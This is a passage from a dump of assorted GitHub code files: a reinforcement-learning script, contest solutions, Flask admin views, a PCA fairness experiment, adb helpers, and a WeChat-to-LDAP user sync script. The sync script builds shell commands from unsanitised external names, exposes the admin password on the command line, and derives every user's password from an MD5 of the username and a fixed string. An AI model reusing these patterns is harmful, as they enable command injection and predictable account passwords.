n_action), np.float32)\n\n# initialize transition table\np = np.zeros((n_state, n_action, n_state), np.float32)\np[:, 0, 0] = 1\np[:, 0, 1] = 0\np[:, 1, 0] = 0\np[:, 1, 1] = 1\n\n# initialize cost table\ng = np.zeros((n_state, n_action), np.float32)\ng[0, 0] = -r_A\ng[0, 1] = c - r_B\ng[1, 0] = c - r_A\ng[1, 1] = -r_B\n\n# run value iteration\nfor k in range(1000):\n pre_Q_table = np.copy(Q_table)\n for i in range(n_state):\n for u in range(n_action):\n Q_table[i, u] = g[i, u]\n for j in range(n_state):\n Q_table[i, u] += a * p[i, u, j] * np.min(pre_Q_table[j, 
:])\n\nprint(Q_table)\n","repo_name":"junmokane/Value_Iteration","sub_path":"value_iteration.py","file_name":"value_iteration.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"37716117780","text":"MOD=10**9+7\nN=int(input())\nt_array=list(map(int, input().split()))\na_array=list(map(int, input().split()))[::-1]\nt_minmax=[]\nbefore_max=0\nfor t in t_array:\n if t>before_max:\n t_minmax.append((t,t))\n before_max=t\n else:\n t_minmax.append((1,before_max))\na_minmax=[]\nbefore_max=0\nfor a in a_array:\n if a>before_max:\n a_minmax.append((a,a))\n before_max=a\n else:\n a_minmax.append((1,before_max))\na_minmax=a_minmax[::-1]\nr=1\nfor i in range(N):\n t_min,t_max=t_minmax[i]\n a_min,a_max=a_minmax[i]\n min_val=max(t_min,a_min)\n max_val=min(t_max,a_max)\n num=max(0,max_val-min_val+1)\n r*=num\n r%=MOD\nprint(r)\n","repo_name":"mfujiwara/atcoder-ruby","sub_path":"AGC-Like/code-festival-2016-qualc/c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"12004309614","text":"import os\nimport requests\nimport json\nimport hashlib\nimport datetime\nimport random\nimport pypinyin\n\n\n#企业微信的后台管理和企业微信的secret\nCORPID = \"xxxxxxx\"\nSECRET = \"xxxxxxx\"\n\nTOKEN_URL = 'https://qyapi.weixin.qq.com/cgi-bin/gettoken'\nGROUP_URL = 'https://qyapi.weixin.qq.com/cgi-bin/department/list'\nMEMBER_URL = 'https://qyapi.weixin.qq.com/cgi-bin/user/simplelist'\nLDAP_USER = \"cn=root,dc=example,dc=com\"\nLDAP_PASWD = \"xxxxxxx\"\nDIR_PATH = os.path.split(os.path.realpath(__file__))[0]\n#prod\n#SERVER_HOST = \"ldap://172.17.2.136\"\n#test\nSERVER_HOST = \"ldap://192.168.12.93\"\nGROUP_CONF = \"%s/partment.ldif\"%(DIR_PATH)\nMEMBER_CONF = \"%s/member.ldif\"%(DIR_PATH)\nMODIFY_CONF = \"%s/modify.ldif\"%(DIR_PATH)\nMEMBER_CACHE = \"%s/member.json\"%(DIR_PATH)\nGROUP_CACHE = \"%s/group.json\"%(DIR_PATH)\n\ndef dataGet(url,params):\n \"\"\"获取数据小函数\"\"\"\n res = requests.get(url=url,params=params)\n return res\n\ndef cnToen(word):\n \"\"\"汉字转换为拼音\"\"\"\n str = ''\n for i in pypinyin.pinyin(word, style=pypinyin.NORMAL):\n str += ''.join(i)\n return str\n\ndef uniqrandom():\n nowTime = datetime.datetime.now().strftime(\"%Y%m%d%H%M%S\")\n ranDom = random.randint(0,100000)\n return str(nowTime)+str(ranDom)\n\ndef saveData(filedict):\n \"\"\"保存新拉的数据到本地缓存文件 以便下次拉取进行对比\"\"\"\n for i in filedict:\n json.dump(filedict[i],open(i,'w'))\n\ndef genPasswd(name):\n \"\"\"生成每个成员的密码 md5\"\"\"\n src = \"%sYsx@1ppt\"%(name)\n modify = hashlib.md5()\n modify.update(src.encode(\"utf-8\"))\n return modify.hexdigest()\n\nACCESSTOKEN = dataGet(TOKEN_URL,{'corpid':CORPID,'corpsecret':SECRET}).json()['access_token']\nGROUPLISTGET = dataGet(GROUP_URL,{'access_token':ACCESSTOKEN})\n\ndef wechatDataRet():\n groupDict = {}\n memberDict = {}\n for i in GROUPLISTGET.json()['department']:\n \"\"\"\n 循环取出wechat所有部门名称 以及对应的id 转换为拼音 并添加到group dict中\n 循环通过每个部门的id取出部门里所有人员名称 以及对应的部门id 并添加到member dict中\n \"\"\"\n memberListGet = dataGet(MEMBER_URL,{'access_token':ACCESSTOKEN,'department_id':i['id']})\n groupDict[i['id']] = cnToen(i['name'])\n \"\"\"由于在json规则中userid的为人员名称的拼音 所以直接取userid即可\"\"\"\n for i in memberListGet.json()['userlist']:\n memberDict[(i[\"userid\"]).lower()] = i['department']\n return groupDict,memberDict\n\ndef difNeOl(data,file):\n \"\"\"\n 针对新拉取的数据与旧缓存数据进行比对\n old - new 表示缓存存在 但是wechat不存在 即删除ldap账号\n new - old 
表示wechat存在 但是缓存没有 即添加账号\n \"\"\"\n old_Memb = json.load(open(MEMBER_CACHE))\n old_Grou = json.load(open(GROUP_CACHE))\n if file == GROUP_CACHE:\n old = set(old_Grou.values())\n new = set(data.values())\n return list(old - new),list(new - old)\n elif file == MEMBER_CACHE:\n old = set(old_Memb)\n new = set(data)\n return list(old - new), list(new - old)\n else:\n print(\"cache file Error\")\n\ndef initLdap(choose,data,conf):\n \"\"\"执行创建语句\"\"\"\n genraLdif(choose=choose, data=data)\n os.system('ldapadd -x -D %s -w %s -H %s -f %s' % (LDAP_USER, LDAP_PASWD, SERVER_HOST, conf))\n\ndef syncMembInfo(data,choose):\n \"\"\"如果有已离开或者新入职的员工他是在哪个部门 获取部门\"\"\"\n old_Memb = json.load(open(MEMBER_CACHE))\n old_Grou = json.load(open(GROUP_CACHE))\n if data and choose == \"dele\":\n for i in data:\n old_memb = old_Memb[i]\n os.system('ldapdelete -x -D %s -w %s -H %s \\\n \"cn=%s,ou=people,dc=yunshuxie,dc=com\"'%(LDAP_USER,LDAP_PASWD,SERVER_HOST,i))\n confluenceUser(\"delete\",i)\n for z in old_memb:\n groupEdit(\"delete\",i,old_Grou[str(z)])\n print(\"%s -- %s\"%(i,choose))\n elif data and choose == \"add\":\n for i in data:\n initLdap(\"member\", i, MEMBER_CONF)\n confluenceUser(choose,i)\n for z in memberDic[i]:\n groupEdit(choose,i,groupDic[z])\n print(\"%s -- %s\"%(i,choose))\n else:\n print('人员无%s'%(choose))\n\ndef syncGroup(group,choose):\n \"\"\"对部门进行增删同步\"\"\"\n if group and choose == \"dele\":\n for i in group:\n os.system('ldapdelete -x -D %s -w %s -H %s \\\n \"ou=%s,ou=group,dc=yunshuxie,dc=com\"'%(LDAP_USER,LDAP_PASWD,SERVER_HOST,i))\n print(\"%s部门已删除\"%(i))\n elif group and choose == \"add\":\n for i in group:\n initLdap(\"partment\",i,GROUP_CONF)\n print(\"%s部门已添加\"%(i))\n else:\n print('人事架构无%s'%(choose))\n\ndef confluenceUser(choose,name):\n \"\"\"关联所有成员到confluence-user组中\"\"\"\n confluenceUser=\"\"\"\n dn: ou=confluence-users,ou=group,dc=yunshuxie,dc=com\n changetype: modify\n %s: uniqueMember\n uniqueMember: cn=%s,ou=people,dc=yunshuxie,dc=com\n \"\"\"%(choose,name)\n with open(MODIFY_CONF,'w') as f:\n f.write(confluenceUser.replace(\" \",\"\"))\n os.system('ldapadd -x -D %s -w %s -H %s -f %s' % (LDAP_USER, LDAP_PASWD, SERVER_HOST, MODIFY_CONF))\n\ndef groupEdit(choose,name,partment):\n \"\"\"对每个成员进行所在的组关联以及 删除时对成员的组进行同步删除\"\"\"\n modifyLdif=\"\"\"\n dn: ou=%s,ou=group,dc=yunshuxie,dc=com\n changetype: modify\n %s: uniqueMember\n uniqueMember: cn=%s,ou=people,dc=yunshuxie,dc=com\n \"\"\"%(partment,choose,name)\n\n\n with open(MODIFY_CONF, 'w') as f:\n f.write(modifyLdif.replace(\" \", \"\"))\n os.system('ldapadd -x -D %s -w %s -H %s -f %s' % (LDAP_USER, LDAP_PASWD, SERVER_HOST, MODIFY_CONF))\n\ndef genraLdif(choose, data):\n partmentLdif = \"\"\"\n dn: ou=%s,ou=group,dc=yunshuxie,dc=com\n objectClass: groupOfUniqueNames\n cn: %s\n uniqueMember: ou=manager,dc=yunshuxie,dc=com\n \"\"\" % (data, data)\n\n memberLdif = \"\"\"\n dn: cn=%s,ou=people,dc=yunshuxie,dc=com\n objectClass: top\n objectClass: inetOrgPerson\n objectClass: posixAccount\n givenName: %s\n mail: %s@yunshuxie.com\n uid: %s\n displayName: %s\n userPassword: %s\n description: LDAP %s\n gidNumber: 1007\n uidNumber: %s\n homeDirectory: /home/%s\n sn: %s\n cn: %s\n \"\"\" % (data, data, data, data, data, genPasswd(data), data, uniqrandom(), data, data, data)\n if choose == \"partment\":\n with open(GROUP_CONF,'w') as f:\n f.write(partmentLdif.replace(\" \",\"\"))\n elif choose == \"member\":\n with open(MEMBER_CONF,\"w\") as f:\n f.write(memberLdif.replace(\" \",\"\"))\n else:\n print(\"argments Error\")\n exit()\n\n\n\nif 
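The difNeOl comparison above boils down to two set differences per sync pass: names only in the cache are stale (to be deleted from LDAP), names only in the fresh WeChat pull are new (to be added). The core, isolated with made-up member names:

def plan_sync(cached, fetched):
    cached, fetched = set(cached), set(fetched)
    # (stale entries to delete, new entries to add)
    return sorted(cached - fetched), sorted(fetched - cached)

to_delete, to_add = plan_sync({"alice", "bob"}, {"bob", "carol"})
print(to_delete, to_add)  # ['alice'] ['carol']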
os.path.exists(\"%s\"%(MEMBER_CACHE)) and os.path.getsize(\"%s\"%(MEMBER_CACHE)) \\\n and os.path.exists(\"%s\"%(GROUP_CACHE)) and os.path.getsize(\"%s\"%(GROUP_CACHE)):\n \"\"\"\n 判断如果缓存文件都存在并且都不为空则视为人事框架及人员已存在 直接进行增量增删即可\n 如果不符合要求 即视为ldap人事架构及人员为空 需重新初始化 并创建\n \"\"\"\n groupDic, memberDic = wechatDataRet()\n old_G,new_G = difNeOl(groupDic,GROUP_CACHE)\n old_M, new_M = difNeOl(memberDic, MEMBER_CACHE)\n syncGroup(new_G,\"add\")\n syncMembInfo(new_M, \"add\")\n syncMembInfo(old_M,\"dele\")\n syncGroup(old_G, \"dele\")\n saveData({MEMBER_CACHE:memberDic,GROUP_CACHE:groupDic})\n print(\"%s 部门数:%s,人员数:%s\" % (datetime.datetime.now(),len(groupDic), len(memberDic)))\nelse:\n groupDic, memberDic = wechatDataRet()\n for id,departments in groupDic.items():\n initLdap(\"partment\",departments,GROUP_CONF)\n for member,id in memberDic.items():\n initLdap(\"member\",member,MEMBER_CONF)\n confluenceUser(\"add\", member)\n for i in memberDic[member]:\n groupEdit(\"add\",member,groupDic[i])\n print(\"%s 部门数:%s,人员数:%s\" % (datetime.datetime.now(),len(groupDic), len(memberDic)))\n saveData({MEMBER_CACHE:memberDic,GROUP_CACHE:groupDic})","repo_name":"liangyawang121109/work_python","sub_path":"wetoldap.py","file_name":"wetoldap.py","file_ext":"py","file_size_in_byte":8223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"32108242504","text":"# !/usr/bin/env python\n# -*- coding:utf-8 -*-\n# project name: Android_Ui_Automation\n# author: \"Lei Yong\" \n# creation time: 2018/1/10 下午6:35\n# Email: leiyong711@163.com\n\nimport os\nimport re\n\n\ndef getDevices():\n\n # 获取手机信息\n def Info():\n\n # 手机信息正则限制\n def modified(name):\n try:\n reu = list(os.popen(name).readlines())\n return re.findall('.*', reu[0])[0] # ([^\\s\\\\\\]+)\n except:\n return 'Get error'\n brand = modified('adb shell getprop ro.product.brand') # 读取手机品牌\n phone_models = modified('adb shell getprop ro.semc.product.name') # 读取设备型号\n deviceVersion = modified('adb shell getprop ro.build.version.release') # 读取设备系统版本号\n readDeviceId = list(os.popen('adb devices').readlines()) # 读取设备 id\n devices = str(readDeviceId[1])[:-8] # 正则表达式匹配出 id 信息\n # devices = re.findall(r'^\\w*\\b', readDeviceId[1])[0] # 正则表达式匹配出 id 信息\n # if phone_models == '':\n # phone_models = u'获取失败'\n if not devices:\n devices = 'Get error'\n return brand, phone_models, deviceVersion, devices # 返回品牌、型号、系统版本、设备id\n\n # 得到运行内存\n def men(devices):\n cmd = \"adb -s \"+devices+ \" shell cat /proc/meminfo\"\n get_cmd = os.popen(cmd).readlines()\n men_total = 0\n men_total_str = \"MemTotal\"\n for line in get_cmd:\n if line.find(men_total_str) >= 0:\n men_total = line[len(men_total_str) +1:].replace(\"kB\", \"\").strip()\n break\n ram = int(men_total) / 1024\n return str(ram) + \"MB\"\n\n # 得到CPU核心数\n def cpu(devices):\n cmd = \"adb -s \" +devices +\" shell cat /proc/cpuinfo\"\n get_cmd = os.popen(cmd).readlines()\n find_str = \"processor\"\n int_cpu = 0\n for line in get_cmd:\n if line.find(find_str) >= 0:\n int_cpu += 1\n return str(int_cpu) + \"核\"\n\n # 得到手机分辨率\n def appPix(devices):\n try:\n result = os.popen(\"adb -s %s shell wm size\" % devices, \"r\")\n return result.readline().split(\"Physical size:\")[1]\n except:\n return 'Get error'\n\n # 获取电量\n def batteryCapacity():\n get_cmd = os.popen(\"adb shell dumpsys battery\").readlines()\n for i in range(0, len(get_cmd)):\n a = str(get_cmd[i])\n b = 'level'\n p = a.find(b)\n try:\n if p != -1:\n s = get_cmd[i].split('level')\n Battery = 
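The adb reads above go through os.popen, which hides failures entirely; subprocess.run surfaces the exit code and supports a timeout. A sketch of the same getprop read, assuming adb is on PATH with a single device attached:

import subprocess

def adb_getprop(prop):
    res = subprocess.run(["adb", "shell", "getprop", prop],
                         capture_output=True, text=True, timeout=10)
    # Empty output or a nonzero exit code both mean the read failed.
    if res.returncode == 0 and res.stdout.strip():
        return res.stdout.strip()
    return "Get error"

print(adb_getprop("ro.build.version.release"))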
\"\".join(s).strip('\\n').strip(\"'\").strip(' : ')\n return int(Battery)\n except:\n return u'获取电量失败'\n return 'Get error'\n\n startPower = batteryCapacity()\n brand, model, systemVersion, deviceId = Info() # 返回品牌、型号、系统版本、设备id\n men = men(deviceId)\n cpu = cpu(deviceId)\n appPix = appPix(deviceId)\n x = [\"brand = %s\\nmodel = %s\\nplatformName = Android\\nsystemVersion = %s\\ndeviceId = %s\\nmen = %s\\ncpu = %s\\nappPix = %s\\nstartPower = %s\\n\"\n % (brand, model, systemVersion, deviceId, men, cpu, appPix, startPower)]\n with open(\"../config/app.conf\", \"a\") as f: # 写出应用配置信息\n f.write(\"\\n[phoneConf]\\n\")\n for i in x:\n f.write(i)\n # 获取启动类\n\n\nif __name__ == '__main__':\n getDevices()\n","repo_name":"leiyong711/Android_Ui_Automation","sub_path":"Handle/getDevicesInfo.py","file_name":"getDevicesInfo.py","file_ext":"py","file_size_in_byte":3697,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"67"} +{"seq_id":"25080055359","text":"# This Python file uses the following encoding: utf-8\n\n### Converts .lemmatized files such that each incorrectly tokenized abbreviation,\n### as specified in the provided abbreviations file, where the period used at\n### the end has been separated from the abbreviation is restored as a single\n### token, e.g. hv followed by . is restored to hv.\n### The script will also convert the lemma to the unabbreviated form as\n### specified in the same abbreviations file.\n\n### Usage:\n### python3 risamalheild_fix_abbreviations.py [input file] [output file] [abbreviations file]\n\n### Created by Kristján Rúnarsson\n\nimport sys,re\n\n# Define RegEx pattern for characters in tags\ntagchars = '0-9a-zþæðöáéýúíó\\.-'\n\n# Open abbreviations file\nabbrfile = open(sys.argv[3], 'r')\n# Create empty dictionary for abbreviations\nabbr = {}\n# Load abbreviations from file\nfor line in abbrfile:\n (key, val) = line.split()\n abbr[key] = val\nabbrfile.close()\n\n# Open input file for reading\nf = open(sys.argv[1], 'r')\n# linelist = f.readlines()\noutput = f.read()\nf.close()\n\n# replaces each abbreviation when followed by .\nfor x in abbr:\n xCap = x.capitalize()\n output = re.sub(\"^\"+x+\" [\"+tagchars+\"]+ (\"+x+\"|\"+xCap+\")\\n\\\\. \\\\. \\\\.\", x+\". as \"+abbr[x], output, flags=re.MULTILINE)\n # also look for abbreviations with initial capital (as at the start of sentences)\n output = re.sub(\"^\"+xCap+\" [\"+tagchars+\"]+ (\"+x+\"|\"+xCap+\")\\n\\\\. \\\\. \\\\.\", xCap+\". 
as \"+abbr[x], output, flags=re.MULTILINE)\n\n# Write result to output file\nf = open(sys.argv[2], 'w')\nf.write(output)\nf.close()\n","repo_name":"antonkarl/icecorpus","sub_path":"parsing/scripts/risamalheild_fix_abbreviations.py","file_name":"risamalheild_fix_abbreviations.py","file_ext":"py","file_size_in_byte":1571,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"67"} +{"seq_id":"2884752242","text":"import boto3\n\n\ncognito = boto3.client('cognito-idp', region_name='us-east-1')\n\ndef verify_user(user_pool, user_id):\n try:\n cognito.admin_get_user(\n UserPoolId=user_pool,\n Username=user_id\n )\n return True\n except cognito.exceptions.UserNotFoundException:\n return False\n\n","repo_name":"mxaviersmp/cloud-computing-video-subtitles","sub_path":"backend/cognito_functions.py","file_name":"cognito_functions.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"67"} +{"seq_id":"22192932163","text":"from flask import render_template, url_for, redirect, flash\nfrom app.admin import admin\nfrom app import db\nfrom app.admin.forms.site import SiteForm\nfrom app.models import Organisation, Site\nfrom app.admin.forms.organisation import *\nfrom sqlalchemy.exc import SQLAlchemyError\nfrom flask_login import login_required\n\n\n@admin.route('/site', methods=['GET'])\n@login_required\ndef list_site():\n site = Site.query.all()\n return render_template('admin/site.html',\n rowdata=site,\n title='Site')\n\n\n@admin.route('/Site/add', methods=['GET', 'POST'])\n@login_required\ndef add_site():\n form = SiteForm()\n if form.validate_on_submit():\n site = Site(\n project_id=form.project_id.data.id,\n name=form.name.data,\n description=form.description.data,\n location_polygon=form.location_polygon.data,\n centroid_latitude=form.centroid_latitude.data,\n centroid_longitude=form.centroid_longitude.data,\n sample_period=form.sample_period.data,\n average_period=form.average_period.data,\n )\n try:\n db.session.add(site)\n db.session.commit()\n flash('New record created', 'success')\n except SQLAlchemyError as e:\n db.session.rollback()\n error = str(e.__dict__['orig'])\n flash('{}'.format(error), 'error')\n except:\n db.session.rollback()\n flash('An error occurred - no record created', 'error')\n\n return redirect(url_for('admin.list_site'))\n\n return render_template('form_page.html',\n form=form,\n title=\"Add Site\")\n\n\n@admin.route('/site/delete/', methods=['GET', 'POST'])\n@login_required\ndef delete_site(id):\n site = Site.query.get_or_404(id)\n db.session.delete(site)\n try:\n db.session.commit()\n except SQLAlchemyError as e:\n db.session.rollback()\n error = str(e.__dict__['orig'])\n flash('{}'.format(error), 'error')\n except:\n db.session.rollback()\n flash('An error occurred - delete failed', 'error')\n\n return redirect(url_for('admin.list_site'))\n\n\n\n@admin.route('/site/edit/', methods=['GET', 'POST'])\n@login_required\ndef edit_site(id):\n site = Site.query.get_or_404(id)\n form = SiteForm(obj=site)\n\n if form.validate_on_submit():\n site.project_id = form.project_id.data.id\n site.name = form.name.data\n site.description = form.description.data\n site.location_polygon = form.location_polygon.data\n site.centroid_latitude = form.centroid_latitude.data\n site.centroid_longitude = form.centroid_longitude.data\n site.sample_period = form.sample_period.data\n site.average_period = form.average_period.data\n try:\n db.session.commit()\n return 
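The substitution completed above anchors on line starts (re.MULTILINE) so a token line can be rejoined with the stray period line that follows it. A reduced demo with a one-entry abbreviation dictionary (the entry and tag values here are made up):

import re

abbr = {"hv": "hver"}        # abbreviation -> expansion, as loaded from the file
tagchars = "0-9a-z."         # reduced tag alphabet for the demo
text = "hv as hv\n. . ."     # token line, then the split-off period line

for x in abbr:
    text = re.sub("^" + x + " [" + tagchars + "]+ " + x + "\n\\. \\. \\.",
                  x + ". as " + abbr[x], text, flags=re.MULTILINE)
print(text)  # hv. as hver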
redirect(url_for('admin.list_site'))\n except SQLAlchemyError as e:\n db.session.rollback()\n error = str(e.__dict__['orig'])\n flash('{}'.format(error), 'error')\n except Exception as e:\n db.session.rollback()\n flash('An error occurred - update failed', 'error')\n\n\n return render_template('form_page.html',\n form=form,\n site=site,\n title='Edit Site')\n","repo_name":"NotisSiokas/LionsGate-Smart-Garden-Web-App","sub_path":"app/admin/views/site.py","file_name":"site.py","file_ext":"py","file_size_in_byte":3406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"31561287564","text":"from FairnessAwarePCA.methods import FairnessAwarePCA_MW, FairnessAwarePCA_GD, \\\n PostProcessing_Fairness_Aware_PCA, preprocess_data\nfrom FairnessAwarePCA.SPEA2 import re\nfrom sklearn.decomposition import PCA\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import StratifiedKFold\nimport pandas as pd\nimport numpy as np\nimport pickle\nfrom sklearn.pipeline import Pipeline\n\nX = pd.read_csv(\"./data/credit/default_degree.csv\", skiprows=[0])\ny = X.pop(\"default payment next month\")\nsensitive_feature = \"SEX\"\nsensitive_col = X[sensitive_feature] - 1\nX = X.drop(labels=[sensitive_feature, \"ID\"], axis=1)\ncolumns = X.columns\n\n\nRE_pp_PCA = []\nRE_FairPCA = []\nRE_EfficientFairPCA_non_pairwise = []\nRE_EfficientFairPCA_pairwise = []\nRE_PCA = []\nresults = {}\n\nfor d in range(1, 21):\n print('Started experiment for d= ' + str(d))\n\n # parameters are made sure to make the algorithm converge\n FairPCA = FairnessAwarePCA_MW(sensitive_col, d, 1, 10)\n EfficientFairPCA_non_pairwise = FairnessAwarePCA_GD(sensitive_col, d, 2000, 'non-pairwise')\n EfficientFairPCA_pairwise = FairnessAwarePCA_GD(sensitive_col, d, 2000, 'pairwise')\n postprocessingPCA = PostProcessing_Fairness_Aware_PCA(sensitive_col, d, 0.5, 30)\n pca = Pipeline([('scaler', StandardScaler()), ('pca', PCA(d))])\n\n algorithms = [pca]\n names = ['PCA']\n\n for name, algorithm in zip(names, algorithms):\n RE_lst_test = []\n RE_group0_lst_test = []\n RE_group1_lst_test = []\n RE_lst_train = []\n RE_group0_lst_train = []\n RE_group1_lst_train = []\n\n skf = StratifiedKFold(n_splits=10)\n for train_index, test_index in skf.split(X, sensitive_col):\n X_train, X_test = X.loc[train_index, :], X.loc[test_index, :]\n\n # fit and transform data\n algorithm.fit(X_train.to_numpy())\n\n scaler = algorithm['scaler']\n decomp = algorithm['pca']\n\n # performance on test data:\n X_test_normalized = scaler.transform(X_test.to_numpy())\n X_test_transformed = decomp.transform(X_test_normalized)\n\n\n # calculate overall RE\n RE = re(X_test_normalized, decomp.inverse_transform(X_test_transformed)) / len(X_test)\n RE_lst_test.append(RE)\n\n # performance on train data:\n X_train_normalized = scaler.transform(X_train.to_numpy())\n X_train_transformed = decomp.transform(X_train_normalized)\n\n # calculate overall RE\n RE = re(X_train_normalized, decomp.inverse_transform(X_train_transformed)) / len(X_train)\n RE_lst_train.append(RE)\n\n # calculate group RE for train data\n groups = preprocess_data(X_train, sensitive_col)\n for idx, group_data in enumerate(groups):\n\n if isinstance(group_data, np.ndarray):\n group_data = pd.DataFrame(group_data, columns=columns)\n\n group_data_normalized = scaler.transform(group_data.to_numpy())\n group_data_transformed = decomp.transform(group_data_normalized)\n\n RE_group = re(group_data_normalized, 
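Each view above repeats the same commit / rollback / flash sequence; it factors into one helper. A sketch only -- db and flash stand for the Flask-SQLAlchemy session handle and message helper already imported in this module:

from sqlalchemy.exc import SQLAlchemyError

def safe_commit(db, flash, success_msg=None):
    """Commit the session; on failure roll back and flash the DB error."""
    try:
        db.session.commit()
        if success_msg:
            flash(success_msg, 'success')
        return True
    except SQLAlchemyError as e:
        db.session.rollback()
        flash(str(getattr(e, 'orig', e)), 'error')
        return False
    except Exception:
        db.session.rollback()
        flash('An error occurred - operation failed', 'error')
        return False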
decomp.inverse_transform(group_data_transformed)) / len(group_data)\n\n if idx == 0:\n RE_group0_lst_train.append(RE_group)\n elif idx == 1:\n RE_group1_lst_train.append(RE_group)\n\n # calculate group RE for test data\n groups = preprocess_data(X_test, sensitive_col)\n for idx, group_data in enumerate(groups):\n\n if isinstance(group_data, np.ndarray):\n group_data = pd.DataFrame(group_data, columns=columns)\n\n group_data_normalized = scaler.transform(group_data.to_numpy())\n group_data_transformed = decomp.transform(group_data_normalized)\n\n RE_group = re(group_data_normalized, decomp.inverse_transform(group_data_transformed)) / len(group_data)\n\n if idx == 0:\n RE_group0_lst_test.append(RE_group)\n elif idx == 1:\n RE_group1_lst_test.append(RE_group)\n\n average_RE_overall_train = np.array(RE_lst_train).mean()\n average_RE_0_train = np.array(RE_group0_lst_train).mean()\n average_RE_1_train = np.array(RE_group1_lst_train).mean()\n\n std_RE_overall_train = np.array(RE_lst_train).std()\n std_RE_0_train = np.array(RE_group0_lst_train).std()\n std_RE_1_train = np.array(RE_group1_lst_train).std()\n\n average_RE_overall_test = np.array(RE_lst_test).mean()\n average_RE_0_test = np.array(RE_group0_lst_test).mean()\n average_RE_1_test = np.array(RE_group1_lst_test).mean()\n\n std_RE_overall_test = np.array(RE_lst_test).std()\n std_RE_0_test = np.array(RE_group0_lst_test).std()\n std_RE_1_test = np.array(RE_group1_lst_test).std()\n\n # train data\n key_overall = name + '_train_overall'\n if key_overall in results:\n results[key_overall] += [average_RE_overall_train]\n else:\n results[key_overall] = [average_RE_overall_train]\n\n key_0 = name + '_train_Male'\n if key_0 in results:\n results[key_0] += [average_RE_0_train]\n else:\n results[key_0] = [average_RE_0_train]\n\n key_1 = name + '_train_Female'\n if key_1 in results:\n results[key_1] += [average_RE_1_train]\n else:\n results[key_1] = [average_RE_1_train]\n\n key_overall = name + '_train_overall_std'\n if key_overall in results:\n results[key_overall] += [std_RE_overall_train]\n else:\n results[key_overall] = [std_RE_overall_train]\n\n key_0 = name + '_train_Male_std'\n if key_0 in results:\n results[key_0] += [std_RE_0_train]\n else:\n results[key_0] = [std_RE_0_train]\n\n key_1 = name + '_train_Female_std'\n if key_1 in results:\n results[key_1] += [std_RE_1_train]\n else:\n results[key_1] = [std_RE_1_train]\n\n # test data\n key_overall = name + '_test_overall'\n if key_overall in results:\n results[key_overall] += [average_RE_overall_test]\n else:\n results[key_overall] = [average_RE_overall_test]\n\n key_0 = name + '_test_Male'\n if key_0 in results:\n results[key_0] += [average_RE_0_test]\n else:\n results[key_0] = [average_RE_0_test]\n\n key_1 = name + '_test_Female'\n if key_1 in results:\n results[key_1] += [average_RE_1_test]\n else:\n results[key_1] = [average_RE_1_test]\n\n key_overall = name + '_test_overall_std'\n if key_overall in results:\n results[key_overall] += [std_RE_overall_test]\n else:\n results[key_overall] = [std_RE_overall_test]\n\n key_0 = name + '_test_Male_std'\n if key_0 in results:\n results[key_0] += [std_RE_0_test]\n else:\n results[key_0] = [std_RE_0_test]\n\n key_1 = name + '_test_Female_std'\n if key_1 in results:\n results[key_1] += [std_RE_1_test]\n else:\n results[key_1] = [std_RE_1_test]\n\nf = open(\"experiment_RE_CV_baseline.pickle\", \"wb\")\npickle.dump(results, 
f)\nf.close()\n","repo_name":"Thomasq99/FairnessAwarePCA-method-evaluation","sub_path":"Experiment_RE_baseline.py","file_name":"Experiment_RE_baseline.py","file_ext":"py","file_size_in_byte":7333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"34312482366","text":"import sys\nimport os\nimport settings\nsys.path.append(settings.CARLA_EGG_PATH)\nimport carla\nimport random\nimport time\nimport numpy as np\n\nfrom spawn_npc import NPCClass\nfrom client_bounding_boxes import ClientSideBoundingBoxes\nfrom set_synchronous_mode import CarlaSyncMode\nfrom bb_filter import apply_filters_to_3d_bb\nfrom WeatherSelector import WeatherSelector\n\n\nclass CarlaWorld:\n def __init__(self, HDF5_file):\n self.HDF5_file = HDF5_file\n # Carla initialization\n client = carla.Client('localhost', 2000)\n client.set_timeout(20.0)\n #self.world = client.load_world('Town01')\n self.world = client.get_world()\n print('Successfully connected to CARLA')\n self.blueprint_library = self.world.get_blueprint_library()\n # Sensors stuff\n self.camera_x_location = 1.0\n self.camera_y_location = 0.0\n self.camera_z_location = 2.0\n self.sensors_list = []\n # Weather stuff\n self.weather_options = WeatherSelector().get_weather_options() # List with weather options\n\n # Recording stuff\n self.total_recorded_frames = 0\n self.first_time_simulating = True\n\n def set_weather(self, weather_option):\n # Changing weather https://carla.readthedocs.io/en/stable/carla_settings/\n # Weather_option is one item from the list self.weather_options, which contains a list with the parameters\n weather = carla.WeatherParameters(*weather_option)\n self.world.set_weather(weather)\n\n def remove_npcs(self):\n print('Destroying actors...')\n self.NPC.remove_npcs()\n print('Done destroying actors.')\n\n def spawn_npcs(self, number_of_vehicles, number_of_walkers):\n self.NPC = NPCClass()\n self.vehicles_list, _ = self.NPC.create_npcs(number_of_vehicles, number_of_walkers)\n\n def put_rgb_sensor(self, vehicle, sensor_width=640, sensor_height=480, fov=110):\n # https://carla.readthedocs.io/en/latest/cameras_and_sensors/\n bp = self.blueprint_library.find('sensor.camera.rgb')\n # bp.set_attribute('enable_postprocess_effects', 'True') # https://carla.readthedocs.io/en/latest/bp_library/\n bp.set_attribute('image_size_x', f'{sensor_width}')\n bp.set_attribute('image_size_y', f'{sensor_height}')\n bp.set_attribute('fov', f'{fov}')\n\n # Adjust sensor relative position to the vehicle\n spawn_point = carla.Transform(carla.Location(x=self.camera_x_location, z=self.camera_z_location))\n self.rgb_camera = self.world.spawn_actor(bp, spawn_point, attach_to=vehicle)\n self.rgb_camera.blur_amount = 0.0\n self.rgb_camera.motion_blur_intensity = 0\n self.rgb_camera.motion_max_distortion = 0\n\n # Camera calibration\n calibration = np.identity(3)\n calibration[0, 2] = sensor_width / 2.0\n calibration[1, 2] = sensor_height / 2.0\n calibration[0, 0] 